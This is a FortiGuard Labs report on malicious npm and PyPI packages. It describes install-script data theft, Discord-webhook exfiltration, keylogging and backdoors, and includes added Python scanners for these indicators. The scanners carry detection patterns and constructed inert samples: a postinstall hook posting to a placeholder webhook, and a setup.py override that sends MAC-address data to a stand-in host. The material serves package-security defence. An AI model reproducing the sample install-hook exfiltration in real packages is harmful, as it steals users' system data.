FortiGuard Labs has analyzed malicious software packages detected from November 2024 to the present, identifying various techniques used to exploit system vulnerabilities. This analysis provides insights into the evolving threat landscape and emerging attack methods. FortiGuard Labs leverages our proprietary, AI-driven OSS malware detection system to track and examine these threats. By reviewing the tactics observed—such as low-file-count packages designed to evade detection, command overwrite techniques, and typosquatting—this report outlines key trends and their potential impact on system security.
Since November 2024, Fortinet's automated threat detection platform has identified multiple malicious software packages, revealing various attack techniques used to exploit system vulnerabilities. These analyses show that attackers are employing methods such as obfuscation and install scripts to bypass traditional security measures. This report provides an overview of the identified threats and the techniques observed, reinforcing the importance of robust detection and security strategies in software environments.
FortiGuard Labs' analysis has identified a range of techniques used by attackers to compromise systems, including both well-known and less common methods:
While a low file count is not necessarily malicious on its own, the majority of detected malicious packages (1,082) exhibit one, often containing minimal code designed to evade detection while enabling exploits such as data theft, unauthorized access, or system compromise. Common indicators include command overwrites, where attackers modify installation commands to introduce malicious code or bypass security; suspicious behavior flagged by machine learning systems due to anomalous patterns; and obfuscation techniques like base64 encoding or encryption to conceal harmful payloads. These tactics combine to create lightweight, evasive threats that are challenging to detect but capable of significant damage.
While not all install scripts are malicious, threat actors often use them to silently deploy harmful code during installation, sometimes bypassing security checks. These scripts can modify the standard installation process to execute harmful actions without the user’s knowledge. For example, an install script may include HTTP POST requests for data exfiltration, suspicious API calls like https.get or https.request to communicate with external servers, and hardcoded URLs, such as Discord webhooks, for receiving stolen data. These actions suggest the script is setting up a backdoor or preparing the system for further malicious activities, highlighting the need for careful scrutiny of installation scripts to detect and mitigate potential threats.
Packages lacking a repository URL raise concerns about their legitimacy and transparency, as they often lack clear provenance or accountability, which is typical of malicious software. Without a public repository, verifying the source, tracking development, or assessing potential security issues is difficult. Malicious actors may avoid repositories to evade scrutiny and prevent code inspection, reducing the chances of detection. A missing repository URL, combined with other red flags like suspicious APIs or URLs, increases the likelihood that the package is designed for exploitation, data theft, or other malicious activities.
Suspicious URLs are a key indicator of potentially malicious packages, as they are often used to download additional payloads or establish communication with command-and-control (C&C) servers, giving attackers control over infected systems. These URLs may appear legitimate, disguising their harmful intent to evade detection. Common tactics include using shortened or dynamic URLs, hosting malicious content on trusted platforms, or disguising payloads as safe files. In 974 packages, such URLs are linked to the risk of data exfiltration, further malware downloads, and other malicious actions. It is crucial to scrutinize and monitor external URLs in package dependencies to prevent exploitation.
While essential for software functionality, APIs can be weaponized by malicious actors to perform harmful activities. In 681 detected cases, suspicious APIs like https.get and https.request were used to exfiltrate data, enable command-and-control (C&C) communication, or obscure malicious intent. These APIs may send sensitive information to remote servers or allow remote control of compromised systems. In one example, the use of https.get and https.request in index.js suggests data exfiltration or communication with external sources, a common tactic in malware. Combined with other red flags, such as suspicious URLs, these API calls indicate the potential for malicious or compromised projects.
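The indicators described above (low file count, install scripts, a missing repository URL, hardcoded URLs such as Discord webhooks, and https.get/https.request calls) can be checked together on an unpacked npm package before it is installed. The following is an added example, not FortiGuard's detection logic; the function name, the file-count threshold, and the sample package are assumptions constructed for illustration.

```python
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # npm scripts run at install time
NET_API = re.compile(r"\bhttps?\.(?:get|request)\s*\(")
URL = re.compile(r"https?://[^\s'\"`)]+")
WEBHOOK = re.compile(r"https://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/")
LOW_FILE_COUNT = 3  # assumed threshold; the report gives no number

def triage(files):
    """Map indicator -> evidence for an unpacked npm package (path -> text)."""
    hits = {}
    try:
        manifest = json.loads(files.get("package.json", "{}"))
    except json.JSONDecodeError:
        manifest = {}
    if not isinstance(manifest, dict):
        manifest = {}
    if len(files) <= LOW_FILE_COUNT:
        hits["low_file_count"] = [str(len(files))]
    if not manifest.get("repository"):
        hits["empty_repository"] = ["package.json has no repository field"]
    scripts = manifest.get("scripts")
    for hook in INSTALL_HOOKS:
        if isinstance(scripts, dict) and hook in scripts:
            hits.setdefault("install_script", []).append(f"{hook}: {scripts[hook]}")
    for path, text in sorted(files.items()):
        if not path.endswith((".js", ".cjs", ".mjs")):
            continue
        for m in NET_API.finditer(text):
            hits.setdefault("suspicious_api", []).append(f"{path}: {m.group(0)[:-1].strip()}")
        for url in URL.findall(text):
            kind = "discord_webhook" if WEBHOOK.match(url) else "hardcoded_url"
            hits.setdefault(kind, []).append(f"{path}: {url}")
    return hits

# Constructed sample package, not one of the samples from the report.
SUSPECT = {
    "package.json": json.dumps({"name": "example-pkg", "version": "1.0.0",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": "const https = require('https');\n"
                "const hook = 'https://discord.com/api/webhooks/0000/CONSTRUCTED';\n"
                "https.request(hook, { method: 'POST' });\n",
}

if __name__ == "__main__":
    for indicator, evidence in triage(SUSPECT).items():
        print(indicator, evidence)
```

No single hit is conclusive; as the report notes, it is the combination of indicators that raises the likelihood of a malicious package.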
The recently discovered malicious Python packages AffineQuant-99.6, amzn-aws-glue-ml-libs-python-6.1.5, and amzn-awsglue-6.1.4 exploit the setup.py file to silently collect system information, including the MAC address, hostname, username, and current directory, and send this data to remote servers controlled by the attacker. The script uses system commands (getmac for Windows, ifconfig for Linux/macOS) to retrieve the MAC address, base64-encodes it, and sends it to hidden URLs. A custom installation process using setuptools to override the installation routine ensures the malicious payload runs after the package is installed. This type of attack has been identified in multiple packages and highlights the risk developers face when installing packages from untrusted sources—potentially leading to stolen credentials, system data, and further attacks. To protect themselves, developers should install packages only from trusted sources, review package content before installation, use virtual environments to isolate installs, scan for vulnerabilities with security tools, and keep dependencies up to date.
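Reviewing package content before installation can be done without executing any of it. The following added example (not code from the report or from the analyzed packages) parses a setup.py with Python's ast module and reports an overridden install command together with system-command, base64, and network calls; the heuristic lists, function names, and the inert sample are assumptions constructed for illustration.

```python
import ast

RISKY_MODULES = {"subprocess", "socket", "urllib", "requests", "http", "base64"}  # assumed list
RISKY_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen", "requests.post",
               "subprocess.check_output", "base64.b64encode", "urllib.request.urlopen"}
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}  # setuptools command classes

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join([node.id] + parts[::-1]) if isinstance(node, ast.Name) else ""

def audit_setup_py(source):
    """Statically inspect setup.py text; the code is parsed, never executed."""
    rep = {"cmdclass": [], "hook_classes": [], "imports": set(), "calls": set()}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            rep["imports"] |= {a.name.split(".")[0] for a in node.names} & RISKY_MODULES
        elif isinstance(node, ast.ImportFrom) and node.module:
            rep["imports"] |= {node.module.split(".")[0]} & RISKY_MODULES
        elif isinstance(node, ast.ClassDef):
            if any(dotted(b).split(".")[-1] in HOOK_BASES for b in node.bases):
                rep["hook_classes"].append(node.name)
        elif isinstance(node, ast.Call):
            name = dotted(node.func)
            if name in RISKY_CALLS:
                rep["calls"].add(name)
            if name.split(".")[-1] == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        rep["cmdclass"] += [k.value for k in kw.value.keys
                                            if isinstance(k, ast.Constant)]
    return rep

# Constructed, inert sample: calls are disconnected and the host is a reserved .invalid name.
SAMPLE = '''
import base64, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install
class PostInstall(install):
    def run(self):
        subprocess.check_output(["getmac"])
        base64.b64encode(b"constructed")
        urllib.request.urlopen("https://collector.invalid/")
setup(name="example-pkg", version="0.0.0", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__": print(audit_setup_py(SAMPLE))
```

A cmdclass override is also used by legitimate packages, so the useful signal is the override appearing alongside process execution and outbound network calls in the same setup.py.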
A malicious script (seller-admin-common_6.5.8, seller-rn-mng-lib_6.5.8) is designed to secretly collect sensitive information from a victim’s machine and send it to an external server via a Discord webhook. Upon execution, the script retrieves the internal IP address of the victim’s machine and fetches the external IP address by making an HTTPS request to an online API. It also gathers system details, such as the hostname, username, DNS servers, home directory, and application information. This collected data is then bundled into a JSON object and sent to the attacker’s server, where it can be accessed for further malicious purposes. The combination of internal and external IP addresses, DNS settings, and user details makes the attack highly invasive, enabling attackers to track the victim’s machine and potentially exploit the information for further attacks. Using a Discord webhook adds a layer of stealth, allowing the attacker to collect the stolen data without raising suspicion, making this type of data harvesting ideal for gathering intelligence or executing more targeted cyberattacks.
Recently identified malicious JavaScript code found in the package xeno.dll_1.0.2 uses obfuscation techniques to disguise its true intentions. Upon installation, it logs keystrokes to capture private information such as passwords and credit card details, which are then encrypted and sent to a remote server controlled by the attacker. Additionally, the script installs a backdoor that provides remote access with elevated privileges, giving the attacker full control of the system. The backdoor also collects system-specific data, such as the operating system version, installed applications, and network configuration, and sends it to the attacker’s server for future exploitation.
Disguised as a legitimate service, the attacker’s server makes the malicious activity harder to detect. This stealthy combination of keylogging and remote access allows the attacker to steal sensitive data and conduct further attacks, posing a significant threat to the victim's privacy and system integrity.
The data from FortiGuard Labs’ analysis reveals a diverse array of malicious packages, showcasing the wide range of tactics used by cybercriminals. From simple low-file-count packages to complex, multi-layered attacks that involve combining files, network code, and process execution, attackers are leveraging increasingly sophisticated methods to breach systems.
As cybersecurity threats evolve, it’s crucial for organizations and individuals to stay informed about the latest threats. Proactive defense measures such as regular system updates, advanced threat detection, and user education on identifying suspicious activity are essential in mitigating these growing risks.
Stay vigilant and protect your systems from these emerging threats.
FortiGuard AntiVirus detects the malicious files identified in this report as:
AffineQuant-99.6/main.py: Python/Agent.EBC2!tr
affineQuant-99.6: Python/Agent.EBC2!tr
amzn-aws-glue-ml-libs-python-6.1.5/setup.py: Python/Agent.D31D!tr
amzn-aws-glue-ml-libs-python-6.1.5: Python/Agent.D31D!tr
amzn-awsglue-6.1.4/setup.py: Python/Agent.8960!tr
Amzn-awsglue-6.1.4: Python/Agent.8960!tr
seller-admin-common_6.5.8/index.js: JS/Agent.409D!tr
Seller-admin-common_6.5.8: JS/Agent.409D!tr
seller-rn-mng-lib_6.5.8/index.js: JS/Agent.409D!tr
Seller-rn-mng-lib_6.5.8: JS/Agent.409D!tr
xeno.dll_1.0.2/index.js: JS/Agent.B3EF!tr
Xeno.dll_1.0.2: JS/Agent.B3EF!tr
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.
The FortiDevSec SCA scanner detects malicious packages, including those cited in this report that may operate as dependencies in users' projects in test phases, and prevents those dependencies from being introduced into users' products.
If you believe these or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.